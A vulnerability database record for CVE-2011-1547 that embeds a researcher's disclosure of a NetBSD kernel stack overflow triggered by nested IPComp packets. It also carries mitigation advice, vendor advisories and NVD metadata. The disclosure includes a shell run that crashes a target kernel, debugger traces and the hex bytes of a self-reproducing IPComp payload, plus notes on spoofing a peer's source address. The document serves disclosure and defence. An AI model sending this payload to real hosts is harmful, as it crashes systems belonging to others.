.... ...0 = ECN-CE: 0\n Total Length: 205\n Identification: 0xc733 (50995)\n Flags: 0x00\n 0.. = Reserved bit: Not Set\n .0. = Don\u0027t fragment: Not Set\n ..0 = More fragments: Not Set\n Fragment offset: 0\n Time to live: 64\n Protocol: IPComp (0x6c)\n Header checksum: 0x2e69 [correct]\n [Good: True]\n [Bad : False]\n Source: 192.168.1.1\n Destination: 192.168.1.2\nIP Payload Compression\n Next Header: IPComp (0x6c)\n IPComp Flags: 0x00\n IPComp CPI: DEFLATE (0x0002)\n Data (181 bytes)\n Data: 73656158... \n [Length: 181]\n\n$ gcc ipcomp.c -lz -o ipcomp\n$ sudo ./ipcomp 192.168.1.2\ninfo: created 1024 nested ipcomp payload, 2538 bytes\ninfo: success, packet sent to 192.168.1.2\n\nMar 25 05:34:40 /netbsd: uvm_fault(0xca7bc774, 0x1000, 1) -\u003e 0xe\nMar 25 05:34:40 /netbsd: fatal page fault in supervisor mode\nMar 25 05:34:40 /netbsd: trap type 6 code 0 eip c0633269 cs 8 eflags 10202 cr2 1335 ilevel 0\nMar 25 05:34:40 /netbsd: panic: trap\nMar 25 05:34:40 /netbsd: Begin traceback... \nMar 25 05:34:40 /netbsd: uvm_fault(0xca7bc774, 0, 1) -\u003e 0xe\nMar 25 05:34:40 /netbsd: fatal page fault in supervisor mode\nMar 25 05:34:40 /netbsd: trap type 6 code 0 eip c06e6c90 cs 8 eflags 10246 cr2 8 ilevel 0\nMar 25 05:34:40 /netbsd: panic: trap\nMar 25 05:34:40 /netbsd: Faulted in mid-traceback; aborting... \n\nAdjust depth as required. \n\n(gdb) bt\n#0 ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:112\n#1 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248\n#2 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248\n#3 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248\n#4 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248\n#5 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248\n#6 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248\n[ trimmed ]\n#148 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248\n#149 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248\n#150 0xc0162bbb in ip_input (m=0xc14e1300) at ../../../../netinet/ip_input.c:1059\n#151 0xc0161b82 in ipintr () at ../../../../netinet/ip_input.c:476\n#152 0xc05d6248 in softint_execute (si=0xca79e154, l=0xca7a7a00, s=4) at ../../../../kern/kern_softint.c:539\n#153 0xc05d60e6 in softint_dispatch (pinned=0xca7a7500, s=4) at ../../../../kern/kern_softint.c:811\n(gdb) info frame\nStack level 0, frame at 0xcab9bf08:\n eip = 0xc01ebd5c in ipcomp4_input (../../../../netinet6/ipcomp_input.c:112); saved eip 0xc01ec302\n called by frame at 0xcab9bfa8\n source language c. \n Arglist at 0xcab9bf00, args: m=0xc14e1300\n Locals at 0xcab9bf00, Previous frame\u0027s sp is 0xcab9bf08\n Saved registers:\n ebx at 0xcab9bef8, ebp at 0xcab9bf00, esi at 0xcab9befc, eip at 0xcab9bf04\n(gdb) info target\nSymbols from \"netbsd.gdb\". \nRemote serial target in gdb-specific protocol:\nDebugging a target over a serial line. \n\nTherefore, an oob sp will write attacker controlled data. \n\n(gdb) tb panic\nTemporary breakpoint 2, panic (fmt=0xc0acf54b \"trap\") at ../../../../kern/subr_prf.c:184\n184 kpreempt_disable();\n(gdb) bt\n#0 panic (fmt=0xc0acf54b \"trap\") at ../../../../kern/subr_prf.c:184\n#1 0xc06f0919 in trap (frame=0xcac49f84) at ../../../../arch/i386/i386/trap.c:368\n#2 0xc06f0566 in trap_tss (tss=0xc0cfe5ec, trapno=13, code=0) at ../../../../arch/i386/i386/trap.c:197\n#3 0xc010cb1b in ?? ()\n(gdb) frame 1\n(gdb) info symbol frame-\u003etf_eip\n\netc. \n\n-------------------\nMitigation\n-----------------------\n\n*******************************************************************************\n* Please note, this document is intended for security professionals, network *\n* or systems administrators, and vendors of network equipment and software. *\n* End users need not be concerned. *\n*******************************************************************************\n\nFor numerous reasons, it is a good idea to filter IPComp at the perimeter if it is\nnot expected. Even when implemented correctly, IPComp completely defeats the\npurpose of Delayed Compression in OpenSSH (see CAN-2005-2096 for an example of\nwhy you always want delayed compression). Additionally, the encapsulation means\nany attacks that require link-local access can simply be wrapped in ipcomp and\nare then routable (that is not good). \n\nAffected servers and devices can use packet filtering to prevent the vulnerable\ncode from being exercised. On systems with ipfw, a rule based on the following\nipfw/ipfw6 template can be used, adjust to whitelist expected peers as\nappropriate. \n\n# ipfw add deny proto ipcomp\n\nOn other BSD systems, pfctl rules can be substituted. See vendor documentation for\nhow to configure network appliances to deny IPComp at network boundaries. \n\n-------------------\nSolution\n-----------------------\n\nI would recommend vendors disallow nested encapulation of ipcomp payloads. The\nimplementation of this fix will of course vary by product. \n\nBy the time you read this advisory, a fix should have been committed to the\nNetBSD repository, downstream consumers of NetBSD code are advised to import\nthe changes urgently. \n\nA draft patch from S.P.Zeidler of the NetBSD project is attached for reference. \n\n-------------------\nCredit\n-----------------------\n\nThis bug was discovered by Tavis Ormandy. \n\n-------------------\nGreetz\n-----------------------\n\nGreetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert,\nAsirap, Meder, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene,\nBruce D., djm, Brian C., djrbliss, jono, and all my other elite friends and\ncolleagues. \n\nAnd of course, $1$kk1q85Xp$Id.gAcJOg7uelf36VQwJQ/. \n\nAdditional thanks to Jan, Felix and Meder for their mad xnu skillz. \n\nJan helps organize a security conference called #days held in Lucerne,\nSwitzerland (a very picturesque Swiss city). The CFP is currently open, you\nshould check it out at https://www.hashdays.ch/. \n\n-------------------\nNotes\n-----------------------\n\nAn elegant method of reproducing this flaw would be using self-reproducing\nLempel-Ziv programs, rsc describes the technique here:\n\nhttp://research.swtch.com/2010/03/zip-files-all-way-down.html\n\nThis method would also be able to disrupt non-recursive implementations that\ndo not prevent nested encapulation, such as modern FreeBSD and OpenBSD. An ipcomp\nquine is defined below in GNU C syntax below, and a testcase for Linux\nis attached to this mail. \n\n\n struct {\n uint8_t comp_nxt; // Next Header\n uint8_t comp_flags; // Reserved, must be zero\n uint16_t comp_cpi; // Compression parameter index\n uint8_t comp_data[180]; // Payload\n } ipcomp = {\n .comp_nxt = IPPROTO_COMP,\n .comp_flags = 0,\n .comp_cpi = htons(IPCOMP_DEFLATE),\n .comp_data = {\n 0xca, 0x61, 0x60, 0x60, 0x02, 0x00, 0x0a, 0x00, 0xf5, 0xff,\n 0xca, 0x61, 0x60, 0x60, 0x02, 0x00, 0x0a, 0x00, 0xf5, 0xff,\n 0x02, 0xb3, 0xc0, 0x2c, 0x00, 0x00, 0x05, 0x00, 0xfa, 0xff,\n 0x02, 0xb3, 0xc0, 0x2c, 0x00, 0x00, 0x05, 0x00, 0xfa, 0xff,\n 0x00, 0x05, 0x00, 0xfa, 0xff, 0x00, 0x14, 0x00, 0xeb, 0xff,\n 0x02, 0xb3, 0xc0, 0x2c, 0x00, 0x00, 0x05, 0x00, 0xfa, 0xff,\n 0x00, 0x05, 0x00, 0xfa, 0xff, 0x00, 0x14, 0x00, 0xeb, 0xff,\n 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff,\n 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff,\n 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff,\n 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff,\n 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff,\n 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x0f, 0x00, 0xf0, 0xff,\n 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff,\n 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x0f, 0x00, 0xf0, 0xff,\n 0x82, 0x72, 0x61, 0x5c, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff,\n 0x01, 0x00, 0x00, 0xff, 0xff, 0x82, 0x72, 0x61, 0x5c, 0x00,\n 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0xff, 0xff\n }\n };\n\n\nNote that modern FreeBSD and OpenBSD appear to drop incoming ipcomp packets if\nno TBD entries are known (see netstat -s -p ipcomp statistics, and\nthe setkey documentation). You will have to allow for this while\ntesting. Depending on implementation, You may also need to spoof the\nsource address of a peer, see man 7 raw. \n\nSpecial thanks to rsc and Matthew Dempsky for hints and assistance. \n\nSomething like this may be useful for testing:\n\n# setkey -c\nadd 192.168.0.1 192.168.0.2 ipcomp 0002 -C deflate\n^D\n\n-\n\nI would advise caution when sending malformed or pathological packets\nacross critical infrastructure or the public internet, many embedded devices\nare based on BSD-derived code and may not handle the error gracefully. \n\n-\n\nJulien will be angry I didn\u0027t use scapy, sorry! I am a fan :-)\n\n-\n\nA bug in Xnu\u0027s custom allocator for zlib (deflate_alloc) causes zlib\ninitialisation to fail if ~1k bytes is not available to MALLOC() with M_NOWAIT,\neven though M_WAITOK was intended, as described in the comments:\n\n /*\n * Avert your gaze, ugly hack follows!\n * We init here so our malloc can allocate using M_WAIT. \n * We don\u0027t want to allocate if ipcomp isn\u0027t used, and we\n * don\u0027t want to allocate on the input or output path. \n * Allocation fails if we use M_NOWAIT because init allocates\n * something like 256k (ouch). \n */\n\nHowever with some creativity it is possible to make the allocation succeed. You\ncan observe this bug by sending an ipcomp packet and looking for the memory\nallocation failure in the network statistics (try something like `netstat -s |\ngrep -A16 ipsec:`). You can also set `sysctl -w net.inet.ipsec.debug=1`. \n\n-------------------\nReferences\n-----------------------\n\n- http://research.swtch.com/2010/03/zip-files-all-way-down.html\n research!rsc: Zip Files All The Way Down\n- http://tools.ietf.org/html/rfc3173\n RFC3173: IP Payload Compression Protocol (IPComp)\n- http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/netinet6/ipcomp_input.c?rev=1.36\u0026content-type=text/x-cvsweb-markup\u0026only_with_tag=MAIN\n NetBSD: ipcomp_input.c, v1.36\n- http://www.opensource.apple.com/source/xnu/xnu-1456.1.26/bsd/netinet6/ipcomp_input.c\n Xnu: ipcomp_input.c\n- http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man8/ipfw.8.html\n ipfw -- IP firewall and traffic shaper control program\n- http://www.netbsd.org/docs/network/pf.html\n The NetBSD Packet Filter (generally applies to other popular BSDs). \n- http://fxr.watson.org/fxr/source/netinet6/ipcomp_input.c?v=FREEBSD64#L222\n Earlier versions of FreeBSD were implemented recursively, the code was since refactored. \n- http://fxr.watson.org/fxr/source/netipsec/xform_ipcomp.c?v=FREEBSD81#L299\n The current version is implemented iteratively (see NOTES section on Quine DoS). \n- http://www.force10networks.com/products/ftos.asp\n FTOS - Force10 Operating System\n- http://www.qnx.com/developers/docs/6.4.1/io-pkt_en/user_guide/drivers.html\n QNX Network Drivers Documentation\n\nSupport high-quality journalism in information security by subscribing to LWN\nhttp://lwn.net/ (i have no connection to lwn other than appreciating their\nwork). \n\nI have a twitter account where I occasionally comment on security topics. \n\nhttp://twitter.com/taviso\n\nex$$\n\n-- \n-------------------------------------\ntaviso@cmpxchg8b.com | pgp encrypted mail preferred\n-------------------------------------------------------\n. ----------------------------------------------------------------------\n\n\nSecunia Research and vulnerability disclosures coordinated by Secunia:\n\nhttp://secunia.com/research/\n\n\n----------------------------------------------------------------------\n\nTITLE:\nNetBSD IPComp Payload Decompression Stack Overflow Vulnerability\n\nSECUNIA ADVISORY ID:\nSA43969\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/43969/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43969\n\nRELEASE DATE:\n2011-04-01\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/43969/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/43969/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43969\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nTavis Ormandy has reported a vulnerability in NetBSD, which can be\nexploited by malicious people to cause a DoS (Denial of Service) and\npotentially compromise a vulnerable system. \n\nSOLUTION:\nFixed in the CVS repository. \n\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nPROVIDED AND/OR DISCOVERED BY:\nTavis Ormandy\n\nORIGINAL ADVISORY:\nhttp://www.openwall.com/lists/oss-security/2011/04/01/1\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-1547"
},
{
"db": "CERT/CC",
"id": "VU#668220"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001442"
},
{
"db": "BID",
"id": "47123"
},
{
"db": "PACKETSTORM",
"id": "99969"
},
{
"db": "PACKETSTORM",
"id": "99950"
},
{
"db": "PACKETSTORM",
"id": "99966"
}
],
"trust": 2.88
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#668220",
"trust": 2.9
},
{
"db": "NVD",
"id": "CVE-2011-1547",
"trust": 2.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001442",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "43969",
"trust": 0.8
},
{
"db": "NETBSD",
"id": "NETBSD-SA2011-004",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201105-116",
"trust": 0.6
},
{
"db": "BID",
"id": "47123",
"trust": 0.3
},
{
"db": "SECUNIA",
"id": "43995",
"trust": 0.2
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2011/04/01/1",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "99969",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "99950",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "99966",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#668220"
},
{
"db": "BID",
"id": "47123"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001442"
},
{
"db": "PACKETSTORM",
"id": "99969"
},
{
"db": "PACKETSTORM",
"id": "99950"
},
{
"db": "PACKETSTORM",
"id": "99966"
},
{
"db": "NVD",
"id": "CVE-2011-1547"
},
{
"db": "CNNVD",
"id": "CNNVD-201105-116"
}
]
},
"id": "VAR-201105-0256",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.25897437
},
"last_update_date": "2023-12-18T12:52:25.913000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "\u507d\u88c5\u3055\u308c\u305fIPComp\u30d1\u30b1\u30c3\u30c8\u306b\u5bfe\u3059\u308b\u53d7\u4fe1\u51e6\u7406\u306e\u8106\u5f31\u6027",
"trust": 0.8,
"url": "http://www.seil.jp/support/security/a01024.html"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-001442"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-001442"
},
{
"db": "NVD",
"id": "CVE-2011-1547"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.7,
"url": "http://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2011-004.txt.asc"
},
{
"trust": 2.1,
"url": "http://www.kb.cert.org/vuls/id/668220"
},
{
"trust": 2.0,
"url": "http://tools.ietf.org/html/rfc3173"
},
{
"trust": 1.8,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2011-april/080031.html"
},
{
"trust": 0.8,
"url": "http://svn.freebsd.org/viewvc/base?view=revision\u0026revision=220247"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1547"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu668220"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-1547"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/43969"
},
{
"trust": 0.3,
"url": "http://www.netbsd.org/"
},
{
"trust": 0.3,
"url": "http://svn.freebsd.org/viewvc/base/head/sys/netipsec/xform_ipcomp.c?view=log\u0026pathrev=220247"
},
{
"trust": 0.3,
"url": "/archive/1/517283"
},
{
"trust": 0.2,
"url": "http://secunia.com/research/"
},
{
"trust": 0.2,
"url": "http://secunia.com/products/corporate/evm/"
},
{
"trust": 0.2,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.2,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.2,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.2,
"url": "http://www.openwall.com/lists/oss-security/2011/04/01/1"
},
{
"trust": 0.2,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.2,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43995"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/43995/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/43995/#comments"
},
{
"trust": 0.1,
"url": "http://www.opensource.apple.com/source/xnu/xnu-1456.1.26/bsd/netinet6/ipcomp_input.c"
},
{
"trust": 0.1,
"url": "http://www.iana.org/assignments/protocol-numbers/protocol-numbers.xml),"
},
{
"trust": 0.1,
"url": "http://developer.apple.com/library/mac/#documentation/darwin/reference/manpages/man8/ipfw.8.html"
},
{
"trust": 0.1,
"url": "http://fxr.watson.org/fxr/source/netinet6/ipcomp_input.c?v=freebsd64#l222"
},
{
"trust": 0.1,
"url": "http://www.force10networks.com/products/ftos.asp"
},
{
"trust": 0.1,
"url": "http://www.netbsd.org/docs/network/pf.html"
},
{
"trust": 0.1,
"url": "http://www.qnx.com/developers/docs/6.4.1/io-pkt_en/user_guide/drivers.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-1547"
},
{
"trust": 0.1,
"url": "http://lwn.net/"
},
{
"trust": 0.1,
"url": "http://fxr.watson.org/fxr/source/netipsec/xform_ipcomp.c?v=freebsd81#l299"
},
{
"trust": 0.1,
"url": "https://www.hashdays.ch/."
},
{
"trust": 0.1,
"url": "http://twitter.com/taviso"
},
{
"trust": 0.1,
"url": "http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/netinet6/ipcomp_input.c?rev=1.36\u0026content-type=text/x-cvsweb-markup\u0026only_with_tag=main"
},
{
"trust": 0.1,
"url": "http://research.swtch.com/2010/03/zip-files-all-way-down.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/43969/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/43969/#comments"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=43969"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#668220"
},
{
"db": "BID",
"id": "47123"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001442"
},
{
"db": "PACKETSTORM",
"id": "99969"
},
{
"db": "PACKETSTORM",
"id": "99950"
},
{
"db": "PACKETSTORM",
"id": "99966"
},
{
"db": "NVD",
"id": "CVE-2011-1547"
},
{
"db": "CNNVD",
"id": "CNNVD-201105-116"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#668220"
},
{
"db": "BID",
"id": "47123"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001442"
},
{
"db": "PACKETSTORM",
"id": "99969"
},
{
"db": "PACKETSTORM",
"id": "99950"
},
{
"db": "PACKETSTORM",
"id": "99966"
},
{
"db": "NVD",
"id": "CVE-2011-1547"
},
{
"db": "CNNVD",
"id": "CNNVD-201105-116"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-04-01T00:00:00",
"db": "CERT/CC",
"id": "VU#668220"
},
{
"date": "2011-04-01T00:00:00",
"db": "BID",
"id": "47123"
},
{
"date": "2011-04-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-001442"
},
{
"date": "2011-04-01T05:45:55",
"db": "PACKETSTORM",
"id": "99969"
},
{
"date": "2011-04-01T20:44:28",
"db": "PACKETSTORM",
"id": "99950"
},
{
"date": "2011-04-01T05:45:47",
"db": "PACKETSTORM",
"id": "99966"
},
{
"date": "2011-05-09T19:55:03.553000",
"db": "NVD",
"id": "CVE-2011-1547"
},
{
"date": "2011-05-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201105-116"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-08-16T00:00:00",
"db": "CERT/CC",
"id": "VU#668220"
},
{
"date": "2015-03-19T08:41:00",
"db": "BID",
"id": "47123"
},
{
"date": "2013-10-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-001442"
},
{
"date": "2011-09-07T03:16:10.253000",
"db": "NVD",
"id": "CVE-2011-1547"
},
{
"date": "2011-05-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201105-116"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201105-116"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "IPComp encapsulation nested payload vulnerability",
"sources": [
{
"db": "CERT/CC",
"id": "VU#668220"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201105-116"
}
],
"trust": 0.6
}
}
ghsa-gm4v-77j4-2h42
Vulnerability from github
Published
2022-05-17 05:39
Modified
2022-05-17 05:39
Details
Multiple stack consumption vulnerabilities in the kernel in NetBSD 4.0, 5.0 before 5.0.3, and 5.1 before 5.1.1, when IPsec is enabled, allow remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a crafted (1) IPv4 or (2) IPv6 packet with nested IPComp headers.
{
"affected": [],
"aliases": [
"CVE-2011-1547"
],
"database_specific": {
"cwe_ids": [
"CWE-119"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2011-05-09T19:55:00Z",
"severity": "MODERATE"
},
"details": "Multiple stack consumption vulnerabilities in the kernel in NetBSD 4.0, 5.0 before 5.0.3, and 5.1 before 5.1.1, when IPsec is enabled, allow remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a crafted (1) IPv4 or (2) IPv6 packet with nested IPComp headers.",
"id": "GHSA-gm4v-77j4-2h42",
"modified": "2022-05-17T05:39:45Z",
"published": "2022-05-17T05:39:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2011-1547"
},
{
"type": "WEB",
"url": "http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2011-004.txt.asc"
},
{
"type": "WEB",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080031.html"
},
{
"type": "WEB",
"url": "http://www.kb.cert.org/vuls/id/668220"
}
],
"schema_version": "1.4.0",
"severity": []
}
fkie_cve-2011-1547
Vulnerability from fkie_nvd
Published
2011-05-09 19:55
Modified
2024-11-21 01:26
Severity ?
Summary
Multiple stack consumption vulnerabilities in the kernel in NetBSD 4.0, 5.0 before 5.0.3, and 5.1 before 5.1.1, when IPsec is enabled, allow remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a crafted (1) IPv4 or (2) IPv6 packet with nested IPComp headers.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netbsd:netbsd:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9875E709-11BA-4B8F-A2FC-26844DD4D563",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:netbsd:netbsd:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "00564BAA-066A-4627-B6A8-78724E55D363",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:netbsd:netbsd:5.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "E8E6EE58-9C2B-457A-BD0D-EED71A1E4186",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:netbsd:netbsd:5.0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "84241D91-1490-485B-AA07-8335CE458275",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:netbsd:netbsd:5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "730917F8-E1F4-4836-B05A-16B2BA5774DC",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple stack consumption vulnerabilities in the kernel in NetBSD 4.0, 5.0 before 5.0.3, and 5.1 before 5.1.1, when IPsec is enabled, allow remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a crafted (1) IPv4 or (2) IPv6 packet with nested IPComp headers."
},
{
"lang": "es",
"value": "Multiples vulnerabilidades de consumos de pila en el Kernel de NetBSD v4.0, v5.0 con anterioridad a v5.0.3 y v5.1 con anterioridad a v5.1.1, IPsec cuando est\u00e1 activada, permite a atacantes remotos provocar una denegaci\u00f3n de servicio ( corrupci\u00f3n de memoria y kernel panic ) o posiblemente tener un impacto no especificado a trav\u00e9s de paquetes manipulados en ( 1 )IPv4 o ( 2 )IPv6 con cabeceras anidadas IPComp."
}
],
"id": "CVE-2011-1547",
"lastModified": "2024-11-21T01:26:33.833",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
